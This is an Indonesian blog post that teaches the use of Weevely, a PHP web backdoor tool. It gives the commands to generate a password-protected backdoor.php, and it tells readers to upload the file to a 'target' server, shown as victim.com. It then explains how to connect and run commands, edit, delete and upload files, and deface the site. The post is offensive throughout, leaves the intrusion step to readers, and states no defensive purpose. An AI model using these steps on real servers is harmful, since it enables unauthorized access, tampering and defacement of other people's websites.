Sering Muncul

Posted by : Error Connection Kamis, 24 Januari 2013



Weevely merupakan sebuah tool web backdoor yang sangat keren,paling tidak menurut saya peribadi. Kenapa ? ya  karena via console,bagi saya bisa menjalankan tool via konsole merupakan hal yang keren.heheh. Kalau tool GUI kan anak kecil aja juga bisa makeknya.heheh (becanda). Bila kita sudah berhasil upload itu backdoor, kita sudah bisa edit,membuat,download dan upload file hanya dari console terminal.keren kan??heheh.Bagi sahabat – sahabat  yang memakai backbox linux,tool ini sudah tersedia. Untuk distro lainnya saya kurang tahu.
Oke langsung aja kita bahas cara pemakaiannya.
1.Cara create file backdoor.php nya..

ketik di console weevely generate <password> <output path>
misalnya kita mau menaruh file backdoornya di Destop gini caranya
weevely generate password /root/Destop/backdoor.php
setelah kita ketikkan perintah tersebut maka akan tercipta sebuah file backdoor.php di Destop kita.
2. Selanjutnya setelah file backdoornya sudah jadi maka silahkan sahabat – sahabat upload file backdoor.php tadi ke webserver yang jadi sasaran sahabat. Untuk caranya  tidak saya bahas di sini.Cari aja caranya di google banyak kok.
3. Misalkan file backdoor.php sudah kita upload di server dengan alamathttp://www.victim.com/backdoor.php.
Kita ketikkan perintah weevely http://www.victim.com/backdoor.php password
Jika sukses maka kemungkinan besar kita sudah bisa untuk ngapain aja di server itu, mau ngedit,hapus,buat ,upload dan upload file di server tersebut. Coba sahabat – sahabat ketikkan perintah – perintah command line di situ.Misalkan kita ketikan perintah ls, pasti akan terlihat semua file yang ada di dalam direktory tersebut. Mau deface juga bisa.heheh
4. Perintah untuk upload file ,misalnya kita mau upload file errorconnection.php . maka caranya sebagai berikut.
:file.upload /path_file_yang_akan_kita_upload/errorconnection.php /Path_untuk_menaruh_file_yang_kita_upload/errorconnection.php
Itu tadi adalah sedikit tentang penggunaan weevely, untuk mengetahui lebih banyak perintah – perintahnya, sahabat bisa memasukkan peritah weevely -h .
Semoga bermanfa’at….

Leave a Reply

Subscribe to Posts | Subscribe to Comments

- Copyright © My little note to share - Date A Live - Powered by Blogger - Designed by Johanes Djogan -